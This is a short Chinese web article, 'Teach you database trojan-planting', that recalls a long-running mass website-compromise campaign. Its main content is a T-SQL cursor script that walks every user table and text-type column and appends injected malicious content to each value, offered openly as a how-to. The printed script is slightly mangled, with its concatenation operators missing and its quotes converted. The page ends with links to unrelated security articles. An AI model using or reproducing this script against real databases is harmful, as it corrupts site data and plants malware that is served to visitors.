当前位置：移动技术网 > 网络运营>安全>企业安全 > 教你数据库挂马

教你数据库挂马

2018年04月18日 | 移动技术网网络运营 | 我要评论

以前说过的趋势挂马事件，ms这个挂马方法已经流行了很久，从去年就大规模开始了，在网上可以搜到很多痕迹。

sql语句如下：

用游标遍历所有表里如下数据类型的字段，然后update挂马。（全部是允许写入字符的字段）

xtype=99 ntext

xtype=35 text

xtype=231 nvarchar

xtype=167 varchar

———————yd的分割——————————–

declare @t varchar(255),
@c varchar(255)
declare table_cursor cursor for
select
a.name,b.name
from sysobjects a,
syscolumns b
where a.id=b.id and
a.xtype=’u’ and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
open table_cursor
fetch next from table_cursor into @t,@c
while(@@fetch_status=0)
begin
exec(’update [’ @t ’] set [’ @c ’]=
rtrim(convert(varchar,[’ @c ’]))
”挂马内容”’)
fetch next from table_cursor into @t,@c
end
close table_cursor
deallocate table_cursor

———————yd的分割——————————–

您可能感兴趣的文章:

如对本文有疑问，点击进行留言回复！！

企业数据防泄密之举措:电脑文件加密软件还是电脑数据防泄密系统?

现在很多单位局域网都是无纸化办公，公司很多商业机密信息也是以电子文档的方式存储，那么电脑文件加密软件还是电脑数据防泄密系统?下面就跟随小编一起来了解一下... ... [阅读全文]
网络安全基础之网络协议与安全威胁的关系介绍

网络协议是什么呢？网络协议是网络中计算机或设备之间进行通信的一系列规则集合。本文中小编介绍的是网络协议和安全威胁的关系，需要的朋友不妨阅读本文了解一下... 1... [阅读全文]
分享几个IDS开源系统

这篇文章主要介绍了分享几个IDS开源系统,需要的朋友可以参考下... 19-12-01 [阅读全文]
如果不使用杀毒软件保护，您可能会面临最常见的问题?

这篇文章主要介绍了如果不使用杀毒软件保护，您可能会面临最常见的问题,... 20-02-03 [阅读全文]
分享五大免费企业网络入侵检测（IDS）工具

这篇文章主要分享一下五大免费企业网络入侵检测（IDS）工具，当前企业对于网络安全越来越重视，那么后期可能就需要大家多多关注一些安全工具的使用于检测... 19-... [阅读全文]
微信域名防封技术微信域名总是被屏蔽被拦截该如何解决

身在网站要想在微信端被使用，多多少少都会有预防被拦截，是专门为运营网站和公众号的运营者一个研究的工具几十你是正常网站，也是公司企业备案，照样也会被拦截,下面给... [阅读全文]
网站域名被劫持、网站dns被劫持域名跳转到别的网站的解决方法

网站域名被劫持，网站dns被劫持，域名跳转到别的网站怎么解决？出现网站域名跳转到其他网站，这一现象很可能是域名被劫持... 13-07-05 [阅读全文]
警告：如果你的密码设置成这20个，赶紧改了

大家平时设置密码时，为了省事就设置很简单的密码，殊不知却留下了很大的安全隐患... 13-12-06 [阅读全文]
麦咖啡(mcafee) 冬虫草服务器系列防止窜改用户账户的设置

今天放上来的是防止窜改用户账户的设置当黑客攻击服务器时很多时候拿到session就是要提权,作为安全工作者我们要禁止一切可以让黑客提权的途径像建立账户,然后注... [阅读全文]
mcafee 服务器防挂马设置图解教程

之前的规则大家一定用了有一段时间,其实上次的规则做的是时间环境是windows 2003的所以相应的规则是针对的IIS 6.0 的今天放出来是windows 2... [阅读全文]

网友评论


验证码：

教你数据库挂马

2018年04月18日 | 移动技术网网络运营 | 我要评论

您可能感兴趣的文章:

相关文章:

网友评论